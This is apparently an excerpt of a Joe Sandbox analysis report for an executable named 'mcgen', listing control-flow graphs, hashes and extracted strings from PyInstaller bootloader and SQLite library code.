                                                                                                                                                                                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                    • Opcode ID: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                                                                                                                                                                                    • Instruction ID: 447ad0c857d12893f861ae050949b50043e070b3e72dfc6b881d56536d27eec7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E38181B1B1C6A285EB20DF28D0507F933A8AF457A6F448031EB8DC7785DE3CE5858781

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                    • Opcode ID: 5d10e1bdc5eb677b37f82fe4c622a980a6ccb223d526a048addc0d2785746a1e
                                                                                                                                                                                                                                                                    • Instruction ID: 8be978f6cd17b13e4ce43d89b2732511896161ea4acae3bd1ea3e97f422f7712
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d10e1bdc5eb677b37f82fe4c622a980a6ccb223d526a048addc0d2785746a1e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9241A362B086A286EB10DF3994102B97398FF457A6F848532EF0D87B95DF3CE502C745

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 511 7ffd94154450-7ffd94154514 call 7ffd94154150 514 7ffd9415451a-7ffd94154538 511->514 515 7ffd941548c6-7ffd941548c9 511->515 518 7ffd94154552-7ffd94154556 514->518 519 7ffd9415453a-7ffd9415454d 514->519 516 7ffd941548d3-7ffd941548d6 call 7ffd940d6c40 515->516 517 7ffd941548cb-7ffd941548d1 515->517 520 7ffd941548db-7ffd941548e1 call 7ffd94131310 516->520 517->516 517->520 523 7ffd94154566-7ffd94154572 518->523 524 7ffd94154558-7ffd9415455f 518->524 522 7ffd941548ef-7ffd9415490e call 7ffd94202920 519->522 534 7ffd941548e6-7ffd941548e8 520->534 525 7ffd94154574-7ffd94154578 523->525 526 7ffd9415457e-7ffd94154582 523->526 524->523 529 7ffd94154561 call 7ffd940eff80 524->529 525->526 531 7ffd941545fb-7ffd94154606 525->531 532 7ffd94154584-7ffd94154588 526->532 533 7ffd9415458a-7ffd9415458f call 7ffd940f3820 526->533 529->523 538 7ffd94154610-7ffd94154627 call 7ffd940fd6f0 531->538 532->533 536 7ffd941545f8 532->536 539 7ffd94154594-7ffd94154598 533->539 534->522 536->531 544 7ffd94154629-7ffd94154631 538->544 539->536 541 7ffd9415459a-7ffd941545a7 call 7ffd941928c0 539->541 548 7ffd941545de-7ffd941545e5 541->548 549 7ffd941545a9 541->549 546 7ffd94154633-7ffd9415463c 544->546 547 7ffd9415463e 544->547 550 7ffd94154641-7ffd9415464f 546->550 547->550 551 7ffd941545ef-7ffd941545f3 548->551 552 7ffd941545e7-7ffd941545ea call 7ffd940d6400 548->552 553 7ffd941545b0-7ffd941545b9 549->553 554 7ffd94154705 550->554 555 7ffd94154655-7ffd94154658 550->555 558 7ffd941548a9-7ffd941548b1 551->558 552->551 553->553 559 7ffd941545bb-7ffd941545cd call 7ffd940d6880 553->559 556 7ffd9415470a-7ffd9415471d 554->556 560 7ffd9415465a-7ffd9415465f 555->560 561 7ffd94154695-7ffd9415469b 555->561 563 7ffd94154753-7ffd94154766 556->563 564 7ffd9415471f-7ffd94154724 556->564 566 7ffd941548b3-7ffd941548b7 558->566 567 7ffd941548be-7ffd941548c4 558->567 559->548 578 7ffd941545cf-7ffd941545d9 00007FFDAC063010 559->578 560->561 562 7ffd94154661-7ffd94154676 560->562 561->554 565 7ffd9415469d-7ffd941546b0 call 7ffd940d6880 561->565 569 7ffd9415468b-7ffd94154693 call 7ffd9413a8b0 562->569 570 7ffd94154678-7ffd9415467b 562->570 574 7ffd9415476c-7ffd94154774 563->574 575 7ffd94154768 563->575 571 7ffd94154736-7ffd9415473d 564->571 572 7ffd94154726-7ffd9415472b 564->572 593 7ffd941546b2-7ffd941546e3 565->593 594 7ffd941546e6-7ffd941546ed 565->594 566->567 576 7ffd941548b9 call 7ffd940eff50 566->576 567->515 567->534 569->556 570->569 579 7ffd9415467d-7ffd9415467f 570->579 583 7ffd94154740-7ffd9415474e call 7ffd940f2ee0 571->583 580 7ffd94154734 572->580 581 7ffd9415472d-7ffd94154732 572->581 585 7ffd941547bc-7ffd941547be 574->585 586 7ffd94154776-7ffd94154789 call 7ffd940d6880 574->586 575->574 576->567 578->548 579->569 588 7ffd94154681-7ffd94154686 579->588 580->571 581->583 583->563 589 7ffd941547c0-7ffd941547c4 585->589 590 7ffd941547cb-7ffd94154822 call 7ffd940d9180 call 7ffd9414cfb0 585->590 605 7ffd941547a2-7ffd941547a9 586->605 606 7ffd9415478b-7ffd9415479d 586->606 596 7ffd9415489a-7ffd9415489e 588->596 589->590 597 7ffd941547c6 589->597 612 7ffd94154827-7ffd94154839 590->612 593->594 599 7ffd941546ef-7ffd941546f2 call 7ffd940d6400 594->599 600 7ffd941546f7-7ffd94154700 594->600 596->558 603 7ffd941548a0-7ffd941548a4 call 7ffd940f4c10 596->603 597->590 599->600 600->596 603->558 607 7ffd941547b3-7ffd941547b7 605->607 608 7ffd941547ab-7ffd941547ae call 7ffd940d6400 605->608 606->605 607->596 608->607 613 7ffd9415483b-7ffd94154841 call 7ffd940d6400 612->613 614 7ffd94154846-7ffd94154848 612->614 613->614 616 7ffd9415484a-7ffd94154850 call 7ffd9412e520 614->616 617 7ffd94154855-7ffd94154859 614->617 616->617 619 7ffd94154872-7ffd94154874 617->619 620 7ffd9415485b-7ffd94154870 call 7ffd941313a0 617->620 622 7ffd94154885-7ffd94154895 619->622 623 7ffd94154876-7ffd9415487e 619->623 620->596 622->596 623->596 625 7ffd94154880-7ffd94154883 623->625 625->596 625->622
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-879093740
                                                                                                                                                                                                                                                                    • Opcode ID: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
                                                                                                                                                                                                                                                                    • Instruction ID: 28a1649b2d09e1a2cb3863f43ab4f2729998b73667846a661c6dd22398a7bb57
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85E19E23F0CB9186EB34CBE595A03B927A5BB46B88F058235DE4D27796DF38E452C344

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 626 7ff6b9f11210-7ff6b9f1126d call 7ff6b9f1bdf0 629 7ff6b9f11297-7ff6b9f112af call 7ff6b9f24fb4 626->629 630 7ff6b9f1126f-7ff6b9f11296 call 7ff6b9f12710 626->630 635 7ff6b9f112b1-7ff6b9f112cf call 7ff6b9f24f78 call 7ff6b9f12910 629->635 636 7ff6b9f112d4-7ff6b9f112e4 call 7ff6b9f24fb4 629->636 647 7ff6b9f11439-7ff6b9f1146d call 7ff6b9f1bad0 call 7ff6b9f24fa0 * 2 635->647 642 7ff6b9f112e6-7ff6b9f11304 call 7ff6b9f24f78 call 7ff6b9f12910 636->642 643 7ff6b9f11309-7ff6b9f1131b 636->643 642->647 646 7ff6b9f11320-7ff6b9f1133d call 7ff6b9f2040c 643->646 652 7ff6b9f11342-7ff6b9f11345 646->652 653 7ff6b9f1134b-7ff6b9f11355 call 7ff6b9f20180 652->653 654 7ff6b9f11431 652->654 653->654 662 7ff6b9f1135b-7ff6b9f11367 653->662 654->647 664 7ff6b9f11370-7ff6b9f11398 call 7ff6b9f1a230 662->664 667 7ff6b9f11416-7ff6b9f1142c call 7ff6b9f12710 664->667 668 7ff6b9f1139a-7ff6b9f1139d 664->668 667->654 669 7ff6b9f1139f-7ff6b9f113a9 668->669 670 7ff6b9f11411 668->670 672 7ff6b9f113ab-7ff6b9f113c1 call 7ff6b9f20b4c 669->672 673 7ff6b9f113d4-7ff6b9f113d7 669->673 670->667 683 7ff6b9f113cf-7ff6b9f113d2 672->683 684 7ff6b9f113c3-7ff6b9f113cd call 7ff6b9f20180 672->684 674 7ff6b9f113d9-7ff6b9f113e7 call 7ff6b9f39ea0 673->674 675 7ff6b9f113ea-7ff6b9f113ef 673->675 674->675 675->664 678 7ff6b9f113f5-7ff6b9f113f8 675->678 681 7ff6b9f113fa-7ff6b9f113fd 678->681 682 7ff6b9f1140c-7ff6b9f1140f 678->682 681->667 685 7ff6b9f113ff-7ff6b9f11407 681->685 682->654 683->667 684->675 684->683 685->646
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                    • Opcode ID: 3e3032e9574b13eb4f533a8bf58f2fd30dc85792962ca480065207ba416343bd
                                                                                                                                                                                                                                                                    • Instruction ID: 330fa6b6658db6d64631149d41d55a437fdb89db0e66f1d1ee3f65118d593694
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e3032e9574b13eb4f533a8bf58f2fd30dc85792962ca480065207ba416343bd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C51E662B0C6A281E6609F29A4103BA6299FF87BB6F548135EF4DC77C5EE3CE505C740

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 900 7ffd94108ff0-7ffd94109002 901 7ffd94109004-7ffd94109015 call 7ffd940d9350 900->901 902 7ffd94109017-7ffd9410901a 900->902 909 7ffd9410903a-7ffd94109070 call 7ffd940d9350 901->909 904 7ffd94109034 902->904 905 7ffd9410901c-7ffd94109032 call 7ffd940d9350 902->905 908 7ffd94109036-7ffd94109038 904->908 905->908 908->909 911 7ffd94109071-7ffd94109085 908->911 913 7ffd9410908d-7ffd94109090 call 7ffd94108d60 911->913 914 7ffd94109087 911->914 917 7ffd94109095-7ffd9410909a 913->917 914->913 918 7ffd941091bf-7ffd941091cb 917->918 919 7ffd941090a0-7ffd941090a5 917->919 921 7ffd941091cd 918->921 922 7ffd941091d3-7ffd941091e1 918->922 920 7ffd941090b0-7ffd941090b7 919->920 923 7ffd941090bd-7ffd941090cd call 7ffd941554c0 920->923 924 7ffd941091ba 920->924 921->922 927 7ffd941090cf-7ffd941090d9 call 7ffd94107ee0 923->927 928 7ffd941090f6-7ffd94109100 923->928 924->918 941 7ffd941090e2-7ffd941090ef call 7ffd94108d60 927->941 942 7ffd941090db 927->942 929 7ffd94109102-7ffd94109105 928->929 930 7ffd94109107-7ffd9410911c 928->930 932 7ffd9410913e-7ffd94109148 929->932 933 7ffd9410911e-7ffd94109122 930->933 934 7ffd9410912a-7ffd9410912d 930->934 939 7ffd94109152-7ffd94109156 932->939 940 7ffd9410914a-7ffd9410914d call 7ffd940d6400 932->940 933->934 936 7ffd94109124-7ffd94109128 933->936 937 7ffd9410912f-7ffd94109132 934->937 938 7ffd94109134-7ffd9410913b call 7ffd94101530 934->938 936->932 937->932 938->932 946 7ffd94109158-7ffd9410915b 939->946 947 7ffd941091ab-7ffd941091b7 939->947 940->939 941->920 952 7ffd941090f1 941->952 942->941 948 7ffd9410915d 946->948 949 7ffd94109192-7ffd941091a9 call 7ffd940d6d20 946->949 947->924 953 7ffd94109164-7ffd9410916d 948->953 949->924 952->924 953->953 955 7ffd9410916f-7ffd94109181 call 7ffd940d6880 953->955 955->949 959 7ffd94109183-7ffd9410918d 00007FFDAC063010 955->959 959->949
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFDAC063010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFD9414D120), ref: 00007FFD9410918D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-3538577999
                                                                                                                                                                                                                                                                    • Opcode ID: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
                                                                                                                                                                                                                                                                    • Instruction ID: a4d5aeda9dd269145a2fab5d85c97fec08322e74ff0667b2dfbb3ee54fec1b92
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8651B323B1E65285FA349B9194B42796395AF47BA0F58C131DD5D273C7EE3DE446C300

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                    • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                                                    • Instruction ID: 97204bd2ee85d3d6ad1084c1e85c0ccb472648f685519b5a01a069e9fe06400d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E41B6B1B0C6A791EA21DF68E4142E96319FF453A6F900132DB5C83295EF3CE505C780

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 997 7ffd940dffe0-7ffd940e002c 998 7ffd940e0031-7ffd940e00a4 997->998 999 7ffd940e00cb-7ffd940e00db call 7ffd940dd030 998->999 1000 7ffd940e00a6-7ffd940e00b5 call 7ffd940dfa20 998->1000 1007 7ffd940e05e2-7ffd940e05e5 999->1007 1008 7ffd940e00e1-7ffd940e010a 999->1008 1005 7ffd940e00bb-7ffd940e00c6 1000->1005 1006 7ffd940e0647-7ffd940e066a call 7ffd94202920 1000->1006 1005->999 1011 7ffd940e05e7-7ffd940e05ee 1007->1011 1012 7ffd940e0642 1007->1012 1009 7ffd940e0110-7ffd940e0125 1008->1009 1019 7ffd940e0127-7ffd940e0133 1009->1019 1020 7ffd940e0162-7ffd940e016c 1009->1020 1014 7ffd940e0639 1011->1014 1015 7ffd940e05f0-7ffd940e05fa 1011->1015 1012->1006 1014->1012 1017 7ffd940e05fc 1015->1017 1018 7ffd940e0602-7ffd940e062f 1015->1018 1017->1018 1018->1012 1038 7ffd940e0631-7ffd940e0637 1018->1038 1021 7ffd940e0176-7ffd940e0191 1019->1021 1031 7ffd940e0135-7ffd940e013b 1019->1031 1020->1021 1022 7ffd940e016e-7ffd940e0170 1020->1022 1025 7ffd940e019a-7ffd940e01a3 1021->1025 1026 7ffd940e0193-7ffd940e0198 1021->1026 1022->1021 1024 7ffd940e03b8-7ffd940e03bf 1022->1024 1028 7ffd940e040a 1024->1028 1029 7ffd940e03c1-7ffd940e03cb 1024->1029 1030 7ffd940e01a6-7ffd940e01ba call 7ffd94196b40 1025->1030 1026->1030 1042 7ffd940e0413 1028->1042 1033 7ffd940e03d3-7ffd940e0400 1029->1033 1034 7ffd940e03cd 1029->1034 1045 7ffd940e01bc-7ffd940e01d6 call 7ffd9414e010 1030->1045 1046 7ffd940e01d8 1030->1046 1036 7ffd940e0143-7ffd940e0146 1031->1036 1037 7ffd940e013d-7ffd940e0141 1031->1037 1047 7ffd940e041a-7ffd940e041d 1033->1047 1062 7ffd940e0402-7ffd940e0408 1033->1062 1034->1033 1040 7ffd940e014f-7ffd940e0160 1036->1040 1041 7ffd940e0148-7ffd940e014d 1036->1041 1037->1036 1037->1040 1038->1012 1040->1009 1041->1021 1041->1040 1042->1047 1052 7ffd940e01da-7ffd940e01fc 1045->1052 1046->1052 1048 7ffd940e047b-7ffd940e0480 1047->1048 1049 7ffd940e041f-7ffd940e0426 1047->1049 1048->1006 1053 7ffd940e0428-7ffd940e042b 1049->1053 1054 7ffd940e0472 1049->1054 1057 7ffd940e0200-7ffd940e0227 CreateFileW 1052->1057 1060 7ffd940e0433-7ffd940e0460 1053->1060 1061 7ffd940e042d 1053->1061 1054->1048 1058 7ffd940e022d-7ffd940e022f 1057->1058 1059 7ffd940e02d0 1057->1059 1063 7ffd940e0231-7ffd940e0243 1058->1063 1064 7ffd940e027f-7ffd940e028c 1058->1064 1065 7ffd940e02d4-7ffd940e02d7 1059->1065 1060->1048 1089 7ffd940e0462-7ffd940e046d 1060->1089 1061->1060 1062->1042 1066 7ffd940e0245 1063->1066 1067 7ffd940e0247-7ffd940e026d call 7ffd940e0810 1063->1067 1082 7ffd940e02cc-7ffd940e02ce 1064->1082 1083 7ffd940e028e-7ffd940e0294 1064->1083 1069 7ffd940e02d9-7ffd940e0302 call 7ffd940d9350 1065->1069 1070 7ffd940e0307-7ffd940e030b 1065->1070 1066->1067 1087 7ffd940e0271-7ffd940e0273 1067->1087 1088 7ffd940e026f 1067->1088 1069->1070 1074 7ffd940e0311-7ffd940e0321 call 7ffd940d6320 1070->1074 1075 7ffd940e04bf-7ffd940e04cd 1070->1075 1096 7ffd940e0323-7ffd940e032a 1074->1096 1097 7ffd940e037e-7ffd940e0383 1074->1097 1077 7ffd940e04dd-7ffd940e04f6 call 7ffd940d6320 1075->1077 1078 7ffd940e04cf-7ffd940e04db 1075->1078 1100 7ffd940e04f8-7ffd940e04ff 1077->1100 1101 7ffd940e0553-7ffd940e0556 1077->1101 1078->1077 1082->1065 1084 7ffd940e02a6-7ffd940e02a9 1083->1084 1085 7ffd940e0296-7ffd940e02a4 1083->1085 1091 7ffd940e02b2-7ffd940e02c7 1084->1091 1092 7ffd940e02ab-7ffd940e02b0 1084->1092 1085->1084 1085->1091 1094 7ffd940e027b 1087->1094 1095 7ffd940e0275-7ffd940e0279 1087->1095 1088->1087 1089->1006 1091->1057 1092->1082 1092->1091 1094->1064 1095->1059 1095->1094 1098 7ffd940e032c-7ffd940e0336 1096->1098 1099 7ffd940e0375 1096->1099 1103 7ffd940e0389-7ffd940e038e 1097->1103 1104 7ffd940e0485-7ffd940e04ba call 7ffd940dd820 call 7ffd94195b50 1097->1104 1106 7ffd940e0338 1098->1106 1107 7ffd940e033e-7ffd940e036b 1098->1107 1099->1097 1111 7ffd940e054a 1100->1111 1112 7ffd940e0501-7ffd940e050b 1100->1112 1109 7ffd940e0558-7ffd940e055b 1101->1109 1110 7ffd940e055d 1101->1110 1103->1104 1113 7ffd940e0394-7ffd940e03b3 1103->1113 1104->1006 1106->1107 1107->1097 1129 7ffd940e036d-7ffd940e0373 1107->1129 1115 7ffd940e0564-7ffd940e057c 1109->1115 1110->1115 1111->1101 1116 7ffd940e0513-7ffd940e0540 1112->1116 1117 7ffd940e050d 1112->1117 1113->998 1120 7ffd940e0582-7ffd940e058a 1115->1120 1121 7ffd940e057e 1115->1121 1116->1101 1133 7ffd940e0542-7ffd940e0548 1116->1133 1117->1116 1123 7ffd940e05ba-7ffd940e05e0 1120->1123 1124 7ffd940e058c-7ffd940e05a0 call 7ffd94196b40 1120->1124 1121->1120 1123->1006 1131 7ffd940e05b6 1124->1131 1132 7ffd940e05a2-7ffd940e05b4 call 7ffd9414e010 1124->1132 1129->1097 1131->1123 1132->1123 1132->1131 1133->1101
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                                                    • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                                                    • Opcode ID: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
                                                                                                                                                                                                                                                                    • Instruction ID: b2b4b845eb6ad07bec8a15894951dd7132fa572633acc7ba1d3db7e03b614147
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D028321B0964386FA748BA1A4F037B63A0FF86B98F14C235DD4D0A6A6DF3DE565D700

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
